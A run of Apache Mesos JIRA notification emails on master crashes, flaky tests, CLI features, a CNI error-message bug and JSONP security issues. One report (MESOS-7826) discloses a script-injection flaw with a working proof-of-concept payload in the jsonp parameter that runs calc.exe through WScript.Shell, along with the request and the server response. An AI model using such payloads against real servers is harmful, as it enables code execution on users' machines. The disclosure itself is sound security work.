{}, > "type": "GET_EXECUTORS" > } > {noformat} > These results are consistent using the `/state` endpoint on both, agent and > master as well as using the {{GET_STATE}} v1 API call. The agent returns > information about executors, while the master response has none. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7991) fatal, check failed !framework->recovered()
[ https://issues.apache.org/jira/browse/MESOS-7991?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7991: -- Sprint: Mesosphere Sprint 66, Mesosphere Sprint 67, Mesosphere Sprint 68, Mesosphere Sprint 74 (was: Mesosphere Sprint 66, Mesosphere Sprint 67, Mesosphere Sprint 68) > fatal, check failed !framework->recovered() > --- > > Key: MESOS-7991 > URL: https://issues.apache.org/jira/browse/MESOS-7991 > Project: Mesos > Issue Type: Bug >Reporter: Jack Crawford >Assignee: Alexander Rukletsov >Priority: Critical > Labels: reliability > > mesos master crashed on what appears to be framework recovery > mesos master version: 1.3.1 > mesos agent version: 1.3.1 > {code} > W0920 14:58:54.756364 25452 master.cpp:7568] Task > 862181ec-dffb-4c03-8807-5fb4c4e9a907 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756369 25452 master.cpp:7568] Task > 9c21c48a-63ad-4d58-9e22-f720af19a644 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756376 25452 master.cpp:7568] Task > 05c451f8-c48a-47bd-a235-0ceb9b3f8d0c of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756381 25452 master.cpp:7568] Task > e8641b1f-f67f-42fe-821c-09e5a290fc60 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756386 25452 master.cpp:7568] Task > f838a03c-5cd4-47eb-8606-69b004d89808 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756392 25452 master.cpp:7568] Task > 685ca5da-fa24-494d-a806-06e03bbf00bd of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > W0920 14:58:54.756397 25452 master.cpp:7568] Task > 65ccf39b-5c46-4121-9fdd-21570e8068e6 of framework > 889aae9d-1aab-4268-ba42-9d5c2461d871 unknown to the agent > a498d458-bbca-426e-b076-b328f5b035da-S5225 at slave(1) > @10.0.239.217:5051 (ip-10-0-239-217) during re-registration: reconciling with > the agent > F0920 14:58:54.756404 25452 master.cpp:7601] Check failed: > !framework->recovered() > *** Check failure stack trace: *** > @ 0x7f7bf80087ed google::LogMessage::Fail() > @ 0x7f7bf800a5a0 google::LogMessage::SendToLog() > @ 0x7f7bf80083d3 google::LogMessage::Flush() > @ 0x7f7bf800afc9 google::LogMessageFatal::~LogMessageFatal() > @ 0x7f7bf736fe7e > mesos::internal::master::Master::reconcileKnownSlave() > @ 0x7f7bf739e612 mesos::internal::master::Master::_reregisterSlave() > @ 0x7f7bf73a580e > _ZNSt17_Function_handlerIFvPN7process11ProcessBaseEEZNS0_8dispatchIN5mesos8internal6master6MasterERKNS5_9SlaveInfoERKNS0_4UPIDERK6OptionINSt7__cxx1112basic_stringIcSt11char_traitsIcESaIc > RKSt6vectorINS5_8ResourceESaISQ_EERKSP_INS5_12ExecutorInfoESaISV_EERKSP_INS5_4TaskESaIS10_EERKSP_INS5_13FrameworkInfoESaIS15_EERKSP_INS6_17Archive_FrameworkESaIS1A_EERKSL_RKSP_INS5_20SlaveInfo_CapabilityESaIS > 1H_EERKNS0_6FutureIbEES9_SC_SM_SS_SX_S12_S17_S1C_SL_S1J_S1N_EEvRKNS0_3PIDIT_EEMS1R_FvT0_T1_T2_T3_T4_T5_T6_T7_T8_T9_T10_ET11_T12_T13_T14_T15_T16_T17_T18_T19_T20_T21_EUlS2_E_E9_M_invokeERKSt9_Any_dataOS2_ > @ 0x7f7bf7f5e69c process::ProcessBase::visit() > @ 0x7f7bf7f71403 process::ProcessManager::resume() > @ 0x7f7bf7f7c127 > _ZNSt6thread5_ImplISt12_Bind_simpleIFZN7process14ProcessManager12init_threadsEvEUt_vEEE6_M_runEv > @ 0x7f7bf60b5c80 (unknown) > @ 0x7f7bf58c86ba start_thread > @ 0x7f7bf55fe3dd (unknown) > mesos-master.service: Main process exited, code=killed, status=6/ABRT > mesos-master.service: Unit entered failed state. > mesos-master.service: Failed with result 'signal'. > {code} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-5918) Replace jsonp with a more secure alternative
[ https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-5918: -- Labels: security (was: ) > Replace jsonp with a more secure alternative > > > Key: MESOS-5918 > URL: https://issues.apache.org/jira/browse/MESOS-5918 > Project: Mesos > Issue Type: Improvement > Components: json api, webui >Reporter: Yan Xu >Priority: Major > Labels: security > > We currently use the {{jsonp}} technique to bypass CORS check. This practice > has many security concerns (see discussions on MESOS-5911) so we should > replace it with a better alternative. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-5918) Replace jsonp with a more secure alternative
[ https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-5918: -- Component/s: json api > Replace jsonp with a more secure alternative > > > Key: MESOS-5918 > URL: https://issues.apache.org/jira/browse/MESOS-5918 > Project: Mesos > Issue Type: Improvement > Components: json api, webui >Reporter: Yan Xu >Priority: Major > Labels: security > > We currently use the {{jsonp}} technique to bypass CORS check. This practice > has many security concerns (see discussions on MESOS-5911) so we should > replace it with a better alternative. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-7826) XSS in JSONP parameter
[ https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-7826: -- Labels: security (was: ) > XSS in JSONP parameter > -- > > Key: MESOS-7826 > URL: https://issues.apache.org/jira/browse/MESOS-7826 > Project: Mesos > Issue Type: Improvement > Components: json api > Environment: Running as part of DC/OS in a docker container. >Reporter: Vincent Ruijter >Priority: Critical > Labels: security > > It is possible to inject arbitrary content into a server request. Take into > account the following url: > https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b > This will result in the following request: > {code:html} > GET > /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b > HTTP/1.1 > Host: xxx.xxx.com > User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 > Firefox/54.0 > Accept: */* > Accept-Language: en-US,en;q=0.5 > [...SNIP...] > {code} > The server response: > {code:html} > HTTP/1.1 200 OK > Server: openresty/1.9.15.1 > Date: Tue, 25 Jul 2017 09:04:31 GMT > Content-Type: text/javascript > Content-Length: 1411637 > Connection: close > var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", > 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01 > 19:16:40","build_time":149634 > [...SNIP...] > {code} > On Internet Explorer this will trigger a file download, and when executing > the file (state.js), it will pop-up a calculator. It's my recommendation to > apply input validation on this parameter, to prevent abuse. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-6551) Add attach/exec commands to the Mesos CLI
[ https://issues.apache.org/jira/browse/MESOS-6551?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Vinod Kone updated MESOS-6551: -- Priority: Major (was: Critical) > Add attach/exec commands to the Mesos CLI > - > > Key: MESOS-6551 > URL: https://issues.apache.org/jira/browse/MESOS-6551 > Project: Mesos > Issue Type: Task > Components: cli >Reporter: Kevin Klues >Assignee: Armand Grillet >Priority: Major > Labels: debugging, mesosphere > > After all of this support has landed, we need to update the Mesos CLI to > implement {{attach}} and {{exec}} functionality as outlined in the Design Doc -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-8471) Allow revocable_resources capability for mesos-execute
[ https://issues.apache.org/jira/browse/MESOS-8471?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336149#comment-16336149 ] Zhitao Li commented on MESOS-8471: -- A quick attempt is at https://reviews.apache.org/r/65294/ > Allow revocable_resources capability for mesos-execute > -- > > Key: MESOS-8471 > URL: https://issues.apache.org/jira/browse/MESOS-8471 > Project: Mesos > Issue Type: Improvement > Components: cli >Reporter: Zhitao Li >Priority: Minor > > While mesos-execute is a nice tool to quickly test certain behavior of Mesos > itself without an external framework, it seems there is not direct way to > test revocable support in it. > A quick test with the binary suggests that if we infer *REVOCABLE_RESOURCES* > capability from input, this should allow revocable resources on `task` or > `task_group` to be launched to Mesos. -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.
[ https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336134#comment-16336134 ] Andrei Budnik commented on MESOS-7506: -- Steps to reproduce `LinuxCapabilitiesIsolatorFlagsTest.ROOT_IsolatorFlags`: # Add {{::sleep(1);}} before [removing|https://github.com/apache/mesos/blob/e91ce42ed56c5ab65220fbba740a8a50c7f835ae/src/linux/cgroups.cpp#L483] "test" cgroup # recompile # run `GLOG_v=2 sudo GLOG_v=2 ./src/mesos-tests --gtest_filter=LinuxCapabilitiesIsolatorFlagsTest.ROOT_IsolatorFlags --gtest_break_on_failure --gtest_repeat=10 --verbose` > Multiple tests leave orphan containers. > --- > > Key: MESOS-7506 > URL: https://issues.apache.org/jira/browse/MESOS-7506 > Project: Mesos > Issue Type: Bug > Components: containerization > Environment: Ubuntu 16.04 > Fedora 23 > other Linux distros >Reporter: Alexander Rukletsov >Assignee: Andrei Budnik >Priority: Major > Labels: containerizer, flaky-test, mesosphere > Attachments: KillMultipleTasks-badrun.txt, > ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, > ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, > ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, > RestartSlaveRequireExecutorAuthentication-badrun.txt, > TaskWithFileURI-badrun.txt > > > I've observed a number of flaky tests that leave orphan containers upon > cleanup. A typical log looks like this: > {noformat} > ../../src/tests/cluster.cpp:580: Failure > Value of: containers->empty() > Actual: false > Expected: true > Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 } > {noformat} > All currently affected tests: > {noformat} > SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any > more > ROOT_IsolatorFlags > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
[ https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16335940#comment-16335940 ] Benjamin Bannier commented on MESOS-8474: - This failed again with a different error, {noformat} ../../src/tests/storage_local_resource_provider_tests.cpp:1877 block is NONE {noformat} I attached [the full test log|https://issues.apache.org/jira/secure/attachment/12907300/consoleText.txt]. > Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky > > > Key: MESOS-8474 > URL: https://issues.apache.org/jira/browse/MESOS-8474 > Project: Mesos > Issue Type: Bug > Components: storage, test >Affects Versions: 1.5.0 >Reporter: Benjamin Bannier >Assignee: Chun-Hung Hsiao >Priority: Major > Labels: flaky, flaky-test, mesosphere > Attachments: consoleText.txt, consoleText.txt > > > Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled, > {noformat} > ../../src/tests/storage_local_resource_provider_tests.cpp:1898 > Expected: 2u > Which is: 2 > To be equal to: destroyed.size() > Which is: 1 > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
[ https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier updated MESOS-8474: Attachment: consoleText.txt > Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky > > > Key: MESOS-8474 > URL: https://issues.apache.org/jira/browse/MESOS-8474 > Project: Mesos > Issue Type: Bug > Components: storage, test >Affects Versions: 1.5.0 >Reporter: Benjamin Bannier >Assignee: Chun-Hung Hsiao >Priority: Major > Labels: flaky, flaky-test, mesosphere > Attachments: consoleText.txt, consoleText.txt > > > Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled, > {noformat} > ../../src/tests/storage_local_resource_provider_tests.cpp:1898 > Expected: 2u > Which is: 2 > To be equal to: destroyed.size() > Which is: 1 > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
[ https://issues.apache.org/jira/browse/MESOS-8478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier updated MESOS-8478: Labels: flaky flaky-test mesosphere (was: ) > Test MasterTestPrePostReservationRefinement.LaunchTask is flaky > --- > > Key: MESOS-8478 > URL: https://issues.apache.org/jira/browse/MESOS-8478 > Project: Mesos > Issue Type: Bug > Components: master, test >Affects Versions: 1.6.0 >Reporter: Benjamin Bannier >Priority: Major > Labels: flaky, flaky-test, mesosphere > Attachments: consoleText.txt > > > Observed on our internal CI on a plain cmake build on ubuntu-16.04 at > {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}}, > {noformat} > /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269 > Mock function called more times than expected - returning default value. > Function call: authorized(@0x7fe1108c61e0 48-byte object E1-7F 00-00 00-00 00-00 00-00 00-00 07-00 00-00 00-00 00-00 D0-5F 05-E8 E0-7F > 00-00 C0-E9 03-E8 E0-7F 00-00 02-00 00-00 E1-7F 00-00>) > Returns: Abandoned > Expected: to be called once >Actual: called twice - over-saturated and active > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
[ https://issues.apache.org/jira/browse/MESOS-8478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Benjamin Bannier updated MESOS-8478: Attachment: consoleText.txt > Test MasterTestPrePostReservationRefinement.LaunchTask is flaky > --- > > Key: MESOS-8478 > URL: https://issues.apache.org/jira/browse/MESOS-8478 > Project: Mesos > Issue Type: Bug > Components: master, test >Affects Versions: 1.6.0 >Reporter: Benjamin Bannier >Priority: Major > Attachments: consoleText.txt > > > Observed on our internal CI on a plain cmake build on ubuntu-16.04 at > {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}}, > {noformat} > /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269 > Mock function called more times than expected - returning default value. > Function call: authorized(@0x7fe1108c61e0 48-byte object E1-7F 00-00 00-00 00-00 00-00 00-00 07-00 00-00 00-00 00-00 D0-5F 05-E8 E0-7F > 00-00 C0-E9 03-E8 E0-7F 00-00 02-00 00-00 E1-7F 00-00>) > Returns: Abandoned > Expected: to be called once >Actual: called twice - over-saturated and active > {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Created] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
Benjamin Bannier created MESOS-8478: --- Summary: Test MasterTestPrePostReservationRefinement.LaunchTask is flaky Key: MESOS-8478 URL: https://issues.apache.org/jira/browse/MESOS-8478 Project: Mesos Issue Type: Bug Components: master, test Affects Versions: 1.6.0 Reporter: Benjamin Bannier Observed on our internal CI on a plain cmake build on ubuntu-16.04 at {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}}, {noformat} /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269 Mock function called more times than expected - returning default value. Function call: authorized(@0x7fe1108c61e0 48-byte object ) Returns: Abandoned Expected: to be called once Actual: called twice - over-saturated and active {noformat} -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-6822) CNI reports confusing error message for failed interface setup.
[ https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16335568#comment-16335568 ] Qian Zhang commented on MESOS-6822: --- The way we checked the return value of {{os::spawn}} is not correct, we will return {{os::strerror(errno)}} as long as {{os::spawn}} return non-zero. However, when you look at the implementation of {{os::spawn}}, it calls {{waitpid}} on the child process and return its exit status, so when the child process exits with a non-zero status (e.g., it will exit with 127 if the command to be executed can not be found), we will return {{os::strerror(errno)}}, but it is actually {{Success}} because {{waitpid}} succeeds. We should follow the way of the code below to handle the return value of {{os::spawn}}. https://github.com/apache/mesos/blob/1.4.1/src/linux/fs.cpp#L481:L497 > CNI reports confusing error message for failed interface setup. > --- > > Key: MESOS-6822 > URL: https://issues.apache.org/jira/browse/MESOS-6822 > Project: Mesos > Issue Type: Bug > Components: network >Affects Versions: 1.1.0 >Reporter: Alexander Rukletsov >Assignee: Qian Zhang >Priority: Major > > Saw this today: > {noformat} > Failed to bring up the loopback interface in the new network namespace of pid > 17067: Success > {noformat} > which is produced by this code: > https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859 > Note that ssh'ing into the machine confirmed that {{ifconfig}} is available > in {{PATH}}. > Full log: http://pastebin.com/hVdNz6yk -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-6822) CNI reports confusing error message for failed interface setup.
[ https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Qian Zhang updated MESOS-6822: -- Shepherd: Jie Yu Story Points: 2 Sprint: Mesosphere Sprint 73 Target Version/s: 1.6.0 > CNI reports confusing error message for failed interface setup. > --- > > Key: MESOS-6822 > URL: https://issues.apache.org/jira/browse/MESOS-6822 > Project: Mesos > Issue Type: Bug > Components: network >Affects Versions: 1.1.0 >Reporter: Alexander Rukletsov >Assignee: Qian Zhang >Priority: Major > > Saw this today: > {noformat} > Failed to bring up the loopback interface in the new network namespace of pid > 17067: Success > {noformat} > which is produced by this code: > https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859 > Note that ssh'ing into the machine confirmed that {{ifconfig}} is available > in {{PATH}}. > Full log: http://pastebin.com/hVdNz6yk -- This message was sent by Atlassian JIRA (v7.6.3#76005)